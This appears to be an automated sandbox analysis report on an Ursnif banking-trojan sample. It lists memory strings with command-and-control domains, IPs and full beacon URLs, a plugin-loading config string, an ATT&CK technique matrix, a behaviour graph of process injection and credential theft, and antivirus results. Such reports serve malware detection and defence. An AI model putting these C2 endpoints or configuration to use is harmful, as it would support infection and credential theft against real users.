                Source: RuntimeBroker.exe, 00000021.00000002.914359235.0000027D4F702000.00000004.00000001.sdmpString found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
                Source: rundll32.exe, 00000023.00000002.858020344.00000284AAD0C000.00000004.00000040.sdmpString found in binary or memory: GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
                Source: rundll32.exe, 00000023.00000002.858020344.00000284AAD0C000.00000004.00000040.sdmpString found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
                Source: RuntimeBroker.exe, 00000027.00000002.914895977.000001B4FB202000.00000004.00000001.sdmpString found in binary or memory: GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
                Source: RuntimeBroker.exe, 00000027.00000002.914895977.000001B4FB202000.00000004.00000001.sdmpString found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO | LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1OS Credential Dumping1System Time Discovery1Remote Desktop Protocol1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsProcess Injection812Software Packing1Credential API Hooking3Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsPowerShell1Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesEmail Collection11Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rootkit4NTDSSystem Information Discovery26Distributed Component Object ModelCredential API Hooking3Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsQuery Registry1SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonModify Registry1Cached Domain CredentialsSecurity Software Discovery21VNCGUI Input CaptureExfiltration Over C2 ChannelProxy1Jamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion4DCSyncVirtualization/Sandbox Evasion4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection812Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowApplication Window Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 322850 Sample: https___purefile24.top_4352... Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 66 8.8.8.8.in-addr.arpa 2->66 68 1.0.0.127.in-addr.arpa 2->68 70 2 other IPs or domains 2->70 76 Found malware configuration 2->76 78 Multi AV Scanner detection for submitted file 2->78 80 Yara detected  Ursnif 2->80 82 10 other signatures 2->82 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 2->12         started        14 iexplore.exe 1 55 2->14         started        16 iexplore.exe 1 72 2->16         started        signatures3 process4 signatures5 106 Suspicious powershell command line found 9->106 18 powershell.exe 1 30 9->18         started        108 Writes to foreign memory regions 12->108 110 Allocates memory in foreign processes 12->110 112 Modifies the context of a thread in another process (thread injection) 12->112 114 4 other signatures 12->114 22 control.exe 12->22         started        24 WerFault.exe 12->24         started        26 iexplore.exe 31 14->26         started        29 iexplore.exe 29 14->29         started        31 iexplore.exe 29 14->31         started        33 iexplore.exe 35 16->33         started        process6 dnsIp7 58 C:\Users\user\AppData\Local\...\xxfxarla.0.cs, UTF-8 18->58 dropped 60 C:\Users\user\AppData\...\5ycfw01g.cmdline, UTF-8 18->60 dropped 84 Injects code into the Windows Explorer (explorer.exe) 18->84 86 Writes to foreign memory regions 18->86 88 Modifies the context of a thread in another process (thread injection) 18->88 96 2 other signatures 18->96 35 explorer.exe 18->35 injected 39 csc.exe 18->39         started        42 csc.exe 18->42         started        44 conhost.exe 18->44         started        90 Changes memory attributes in foreign processes to executable or writable 22->90 92 Allocates memory in foreign processes 22->92 94 Maps a DLL or memory area into another process 22->94 46 rundll32.exe 22->46         started        74 185.212.47.223, 49766, 49767, 49769 SERVINGADE Sweden 26->74 file8 signatures9 process10 dnsIp11 72 192.168.2.1 unknown unknown 35->72 98 Tries to steal Mail credentials (via file access) 35->98 100 Changes memory attributes in foreign processes to executable or writable 35->100 102 Tries to harvest and steal browser information (history, passwords, etc) 35->102 104 6 other signatures 35->104 48 RuntimeBroker.exe 35->48 injected 50 cmd.exe 35->50         started        52 RuntimeBroker.exe 35->52 injected 62 C:\Users\user\AppData\Local\...\5ycfw01g.dll, PE32 39->62 dropped 54 cvtres.exe 39->54         started        64 C:\Users\user\AppData\Local\...\xxfxarla.dll, PE32 42->64 dropped 56 cvtres.exe 42->56         started        file12 signatures13 process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                https___purefile24.top_4352wedfoifom.dll15%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.loaddll32.exe.1110000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                0.2.loaddll32.exe.1100000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                0.2.loaddll32.exe.2670000.3.unpack100%AviraHEUR/AGEN.1108168Download File

                Domains

                SourceDetectionScannerLabelLink
                1.0.0.127.in-addr.arpa0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.mercadolivre.com.br/0%URL Reputationsafe
                http://www.mercadolivre.com.br/0%URL Reputationsafe
                http://www.mercadolivre.com.br/0%URL Reputationsafe
                http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
                http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
                http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
                http://www.dailymail.co.uk/0%URL Reputationsafe
                http://www.dailymail.co.uk/0%URL Reputationsafe
                http://www.dailymail.co.uk/0%URL Reputationsafe
                http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
                http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
                http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
                http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://%s.com0%URL Reputationsafe
                http://%s.com0%URL Reputationsafe
                http://%s.com0%URL Reputationsafe
                http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/IT0%Avira URL Cloudsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
                http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
                http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
                http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
                http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
                http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
                http://it.search.dada.net/favicon.ico0%URL Reputationsafe
                http://it.search.dada.net/favicon.ico0%URL Reputationsafe
                http://it.search.dada.net/favicon.ico0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://crl.microsoftjX0%Avira URL Cloudsafe
                http://search.hanafos.com/favicon.ico0%URL Reputationsafe
                http://search.hanafos.com/favicon.ico0%URL Reputationsafe
                http://search.hanafos.com/favicon.ico0%URL Reputationsafe
                http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
                http://www.abril.com.br/favicon.ico0%URL Reputationsafe
                http://www.abril.com.br/favicon.ico0%URL Reputationsafe
                http://www.abril.com.br/favicon.ico0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
                http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
                http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
                http://buscar.ozu.es/0%Avira URL Cloudsafe
                http://busca.igbusca.com.br/0%URL Reputationsafe
                http://busca.igbusca.com.br/0%URL Reputationsafe
                http://busca.igbusca.com.br/0%URL Reputationsafe
                http://185.212.47.223/images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F_2FU7Uq7_/2BsmFnH4ELlf_2BlJ/qvasTVtPc160/_2BGCa7BwG5/XiEDVuUR_2F0Zg/IWoXtyylgdv18ab31_2FU/yx4rgH_2FURRWUyZ/6gUwgFPsNHdjJYY/OP6LVL9vnpF_2FlR6l/FN80SaQZn/t.avi0%Avira URL Cloudsafe
                http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0PJdZLTevz9jDLo/EMOcQewMIfz4VuFqodI_2F/M9qdb_2Bkkl9s/3_2FgKSe/HJi5LdFtwmWIaSXCvsyiPML/FIA7MqSfSN/cKd_2BVdiqq56nM6h/Pk9LghTopeqR/aynzZ8A4QuFKH4X/uVs.avi0%Avira URL Cloudsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://search.auction.co.kr/0%URL Reputationsafe
                http://search.auction.co.kr/0%URL Reputationsafe
                http://search.auction.co.kr/0%URL Reputationsafe
                http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
                http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
                http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
                http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
                http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
                http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
                http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
                http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
                http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
                http://google.pchome.com.tw/0%URL Reputationsafe
                http://google.pchome.com.tw/0%URL Reputationsafe
                http://google.pchome.com.tw/0%URL Reputationsafe
                http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
                http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
                http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
                http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
                http://www.gmarket.co.kr/0%URL Reputationsafe
                http://www.gmarket.co.kr/0%URL Reputationsafe
                http://www.gmarket.co.kr/0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://searchresults.news.com.au/0%URL Reputationsafe
                http://searchresults.news.com.au/0%URL Reputationsafe
                http://searchresults.news.com.au/0%URL Reputationsafe
                http://www.asharqalawsat.com/0%URL Reputationsafe
                http://www.asharqalawsat.com/0%URL Reputationsafe
                http://www.asharqalawsat.com/0%URL Reputationsafe
                http://search.yahoo.co.jp0%URL Reputationsafe
                http://search.yahoo.co.jp0%URL Reputationsafe
                http://search.yahoo.co.jp0%URL Reputationsafe
                http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITzmt7sSfSh7DfV8J5Sxs/gsPHQP3GI_2BpFcc/vziIw2uQsRSR2n2/peUDHwQ_2F4Kfd6S1d/5UOnL_2Fv/D83izP4rn_2FwQF9Mfeb/peI8RVGRl9HSt3GBrUm/VAt7e_2BvseRDA8bUBljnL/FhJZ.avi0%Avira URL Cloudsafe
                http://buscador.terra.es/0%URL Reputationsafe
                http://buscador.terra.es/0%URL Reputationsafe
                http://buscador.terra.es/0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                resolver1.opendns.com
                208.67.222.222
                truefalse
                  high
                  1.0.0.127.in-addr.arpa
                  unknown
                  unknowntrueunknown
                  8.8.8.8.in-addr.arpa
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.212.47.223/images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F_2FU7Uq7_/2BsmFnH4ELlf_2BlJ/qvasTVtPc160/_2BGCa7BwG5/XiEDVuUR_2F0Zg/IWoXtyylgdv18ab31_2FU/yx4rgH_2FURRWUyZ/6gUwgFPsNHdjJYY/OP6LVL9vnpF_2FlR6l/FN80SaQZn/t.avifalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0PJdZLTevz9jDLo/EMOcQewMIfz4VuFqodI_2F/M9qdb_2Bkkl9s/3_2FgKSe/HJi5LdFtwmWIaSXCvsyiPML/FIA7MqSfSN/cKd_2BVdiqq56nM6h/Pk9LghTopeqR/aynzZ8A4QuFKH4X/uVs.avifalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITzmt7sSfSh7DfV8J5Sxs/gsPHQP3GI_2BpFcc/vziIw2uQsRSR2n2/peUDHwQ_2F4Kfd6S1d/5UOnL_2Fv/D83izP4rn_2FwQF9Mfeb/peI8RVGRl9HSt3GBrUm/VAt7e_2BvseRDA8bUBljnL/FhJZ.avifalse
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://search.chol.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                      high
                      http://www.mercadolivre.com.br/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.merlin.com.pl/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://search.ebay.de/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                        high
                        http://www.mtv.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                          high
                          http://www.rambler.ru/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                            high
                            http://www.nifty.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                              high
                              http://www.dailymail.co.uk/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www3.fnac.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                high
                                http://buscar.ya.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                  high
                                  http://search.yahoo.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                    high
                                    http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.sogou.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designersexplorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpfalse
                                        high
                                        http://asp.usatoday.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                          high
                                          http://fr.search.yahoo.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                            high
                                            http://rover.ebay.comexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                              high
                                              http://in.search.yahoo.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                high
                                                http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://search.ebay.in/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://%s.comexplorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      low
                                                      http://msk.afisha.ru/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITexplorer.exe, 0000001E.00000003.873444020.000000000DC9A000.00000004.00000040.sdmp, explorer.exe, 0000001E.00000000.846213783.000000000A863000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.zhongyicts.com.cnexplorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000018.00000002.858800178.000001D7ABEC1000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://search.rediff.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.ya.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.naver.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.google.ru/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://crl.microsoftjXWerFault.exe, 00000025.00000003.881569101.0000000004A79000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://search.daum.net/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      https://contoso.com/Iconpowershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://search.naver.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.clarin.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://buscar.ozu.es/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://kr.search.yahoo.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://search.about.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://busca.igbusca.com.br/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                http://www.ask.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.cjmall.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.centrum.cz/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.carterandcone.comlexplorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://suche.t-online.de/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.google.it/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://search.auction.co.kr/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.ceneo.pl/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.amazon.de/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://sads.myspace.com/explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpfalse
                                                                                                    high
